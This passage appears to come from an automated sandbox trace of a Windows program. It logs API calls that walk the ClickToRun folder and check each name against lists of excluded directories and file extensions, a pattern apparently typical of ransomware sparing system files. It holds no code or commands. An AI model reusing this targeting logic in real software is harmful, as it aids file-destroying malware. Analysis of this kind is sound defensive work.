ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x1817ab10, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="ClickToRun", cAlternateFileName="CLICKT~1")) returned 1 [0076.630] lstrcmpiW (lpString1=".", lpString2="ClickToRun") returned -1 [0076.630] lstrcmpiW (lpString1="..", lpString2="ClickToRun") returned -1 [0076.630] lstrcmpiW (lpString1="ClickToRun", lpString2="$windows.~bt") returned 1 [0076.630] lstrcmpiW (lpString1="ClickToRun", lpString2="intel") returned -1 [0076.630] lstrcmpiW (lpString1="ClickToRun", lpString2="msocache") returned -1 [0076.630] lstrcmpiW (lpString1="ClickToRun", lpString2="$recycle.bin") returned 1 [0076.630] lstrcmpiW (lpString1="ClickToRun", lpString2="$windows.~ws") returned 1 [0076.630] lstrcmpiW (lpString1="ClickToRun", lpString2="tor browser") returned -1 [0076.630] lstrcmpiW (lpString1="ClickToRun", lpString2="boot") returned 1 [0076.630] lstrcmpiW (lpString1="ClickToRun", lpString2="system volume information") returned -1 [0076.630] lstrcmpiW (lpString1="ClickToRun", lpString2="perflogs") returned -1 [0076.630] lstrcmpiW (lpString1="ClickToRun", lpString2="google") returned -1 [0076.630] lstrcmpiW (lpString1="ClickToRun", lpString2="application data") returned 1 [0076.630] lstrcmpiW (lpString1="ClickToRun", lpString2="windows") returned -1 [0076.630] lstrcmpiW (lpString1="ClickToRun", lpString2="windows.old") returned -1 [0076.630] lstrcmpiW (lpString1="ClickToRun", lpString2="appdata") returned 1 [0076.630] lstrcmpiW (lpString1="ClickToRun", lpString2="Windows nt") returned -1 [0076.630] lstrcmpiW (lpString1="ClickToRun", lpString2="Msbuild") returned -1 [0076.630] lstrcmpiW (lpString1="ClickToRun", lpString2="Microsoft") returned -1 [0076.630] lstrcmpiW (lpString1="ClickToRun", lpString2="All users") returned 1 [0076.630] lstrcmpiW (lpString1="ClickToRun", lpString2="mozilla") returned -1 [0076.630] wsprintfW (in: param_1=0x344d9a0, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun") returned 58 [0076.630] wsprintfW (in: param_1=0x344d200, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\*") returned 60 [0076.630] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\*"), fInfoLevelId=0x0, lpFindFileData=0x344d6e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344d6e8) returned 0x2e3250 [0076.631] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0076.631] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x175dffd0, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x1817ab10, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x1817ab10, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0076.631] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0076.631] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0076.631] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17a56910, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x17a56910, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x588a4500, ftLastWriteTime.dwHighDateTime=0x1d0c595, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="api-ms-win-core-file-l1-2-0.dll", cAlternateFileName="API-MS~1.DLL")) returned 1 [0076.631] lstrcmpiW (lpString1=".", lpString2="api-ms-win-core-file-l1-2-0.dll") returned -1 [0076.631] lstrcmpiW (lpString1="..", lpString2="api-ms-win-core-file-l1-2-0.dll") returned -1 [0076.631] PathFindExtensionW (pszPath="api-ms-win-core-file-l1-2-0.dll") returned=".dll" [0076.632] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.632] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.632] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.632] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.632] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.632] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.632] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.632] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.632] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.632] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.632] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0076.632] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.632] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0076.632] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0076.632] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0076.632] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0076.632] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0076.632] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0076.632] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0076.632] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0076.632] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0076.632] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0076.632] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0076.632] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0076.632] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0076.632] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0076.632] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0076.633] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0076.633] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0076.633] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0076.633] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0076.633] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0076.633] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0076.633] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0076.633] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0076.633] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0076.633] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0076.633] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0076.633] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0076.633] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17a56910, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x17a56910, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x588a4500, ftLastWriteTime.dwHighDateTime=0x1d0c595, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="api-ms-win-core-file-l2-1-0.dll", cAlternateFileName="API-MS~2.DLL")) returned 1 [0076.633] lstrcmpiW (lpString1=".", lpString2="api-ms-win-core-file-l2-1-0.dll") returned -1 [0076.633] lstrcmpiW (lpString1="..", lpString2="api-ms-win-core-file-l2-1-0.dll") returned -1 [0076.633] PathFindExtensionW (pszPath="api-ms-win-core-file-l2-1-0.dll") returned=".dll" [0076.633] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.633] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.633] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.633] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.633] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.633] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.633] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.633] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.633] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.633] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.634] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0076.634] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.634] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0076.634] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0076.634] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0076.634] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0076.634] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0076.634] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0076.634] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0076.634] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0076.634] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0076.634] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0076.634] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0076.634] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0076.634] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0076.634] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0076.634] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0076.634] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0076.634] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0076.634] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0076.634] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0076.634] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0076.634] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0076.634] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0076.634] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0076.634] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0076.635] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0076.635] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0076.635] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0076.635] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17a56910, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x17a56910, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x588a4500, ftLastWriteTime.dwHighDateTime=0x1d0c595, nFileSizeHigh=0x0, nFileSizeLow=0x52c0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="api-ms-win-core-localization-l1-2-0.dll", cAlternateFileName="API-MS~3.DLL")) returned 1 [0076.635] lstrcmpiW (lpString1=".", lpString2="api-ms-win-core-localization-l1-2-0.dll") returned -1 [0076.635] lstrcmpiW (lpString1="..", lpString2="api-ms-win-core-localization-l1-2-0.dll") returned -1 [0076.635] PathFindExtensionW (pszPath="api-ms-win-core-localization-l1-2-0.dll") returned=".dll" [0076.635] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.635] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.635] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.635] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.635] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.635] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.635] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.635] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.635] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.635] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.635] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0076.635] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.635] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0076.635] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0076.635] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0076.635] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0076.635] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0076.635] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0076.635] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0076.636] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0076.636] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0076.636] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0076.636] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0076.636] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0076.636] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0076.636] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0076.636] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0076.636] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0076.636] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0076.636] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0076.636] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0076.636] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0076.636] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0076.636] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0076.636] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0076.636] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0076.636] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0076.636] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0076.636] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0076.636] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17a56910, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x17a56910, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x588a4500, ftLastWriteTime.dwHighDateTime=0x1d0c595, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="api-ms-win-core-processthreads-l1-1-1.dll", cAlternateFileName="API-MS~4.DLL")) returned 1 [0076.636] lstrcmpiW (lpString1=".", lpString2="api-ms-win-core-processthreads-l1-1-1.dll") returned -1 [0076.636] lstrcmpiW (lpString1="..", lpString2="api-ms-win-core-processthreads-l1-1-1.dll") returned -1 [0076.636] PathFindExtensionW (pszPath="api-ms-win-core-processthreads-l1-1-1.dll") returned=".dll" [0076.636] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.636] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.637] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.637] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.637] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.637] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.637] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.637] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.637] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.637] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.637] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0076.637] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.637] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0076.637] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0076.637] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0076.637] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0076.637] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0076.637] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0076.637] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0076.637] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0076.637] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0076.637] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0076.637] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0076.637] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0076.637] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0076.637] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0076.637] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0076.637] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0076.637] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0076.638] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0076.638] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0076.638] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0076.638] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0076.638] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0076.638] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0076.638] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0076.638] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0076.638] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0076.638] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0076.638] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17a7ca70, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x17a7ca70, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x588a4500, ftLastWriteTime.dwHighDateTime=0x1d0c595, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="api-ms-win-core-synch-l1-2-0.dll", cAlternateFileName="APF10C~1.DLL")) returned 1 [0076.638] lstrcmpiW (lpString1=".", lpString2="api-ms-win-core-synch-l1-2-0.dll") returned -1 [0076.638] lstrcmpiW (lpString1="..", lpString2="api-ms-win-core-synch-l1-2-0.dll") returned -1 [0076.638] PathFindExtensionW (pszPath="api-ms-win-core-synch-l1-2-0.dll") returned=".dll" [0076.638] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.638] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.638] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.638] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.638] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.638] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.638] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.638] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.638] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.638] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.638] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0076.638] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.638] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0076.639] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0076.639] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0076.639] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0076.639] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0076.639] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0076.639] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0076.639] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0076.639] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0076.639] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0076.639] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0076.639] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0076.639] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0076.639] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0076.639] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0076.639] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0076.639] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0076.639] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0076.639] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0076.639] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0076.639] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0076.639] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0076.639] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0076.639] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0076.639] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0076.639] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0076.639] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0076.639] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17a7ca70, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x17a7ca70, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x588a4500, ftLastWriteTime.dwHighDateTime=0x1d0c595, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="api-ms-win-core-timezone-l1-1-0.dll", cAlternateFileName="AP7902~1.DLL")) returned 1 [0076.639] lstrcmpiW (lpString1=".", lpString2="api-ms-win-core-timezone-l1-1-0.dll") returned -1 [0076.640] lstrcmpiW (lpString1="..", lpString2="api-ms-win-core-timezone-l1-1-0.dll") returned -1 [0076.640] PathFindExtensionW (pszPath="api-ms-win-core-timezone-l1-1-0.dll") returned=".dll" [0076.640] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.640] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.640] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.640] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.640] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.640] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.640] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.640] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.640] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.640] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.640] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0076.640] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.640] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0076.640] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0076.640] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0076.640] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0076.640] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0076.640] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0076.640] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0076.640] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0076.640] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0076.640] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0076.640] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0076.640] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0076.640] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0076.641] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0076.641] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0076.641] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0076.641] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0076.641] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0076.641] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0076.641] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0076.641] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0076.641] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0076.641] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0076.641] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0076.641] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0076.641] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0076.641] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0076.641] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17a7ca70, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x17a7ca70, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x588a4500, ftLastWriteTime.dwHighDateTime=0x1d0c595, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="api-ms-win-core-xstate-l2-1-0.dll", cAlternateFileName="APA632~1.DLL")) returned 1 [0076.641] lstrcmpiW (lpString1=".", lpString2="api-ms-win-core-xstate-l2-1-0.dll") returned -1 [0076.641] lstrcmpiW (lpString1="..", lpString2="api-ms-win-core-xstate-l2-1-0.dll") returned -1 [0076.641] PathFindExtensionW (pszPath="api-ms-win-core-xstate-l2-1-0.dll") returned=".dll" [0076.641] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.641] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.641] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.641] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.641] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.641] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.641] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.641] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.641] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.641] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.642] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0076.642] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.642] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17a7ca70, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x17a7ca70, ftLastAccessTime.dwHighDateTime=0x1d70910, 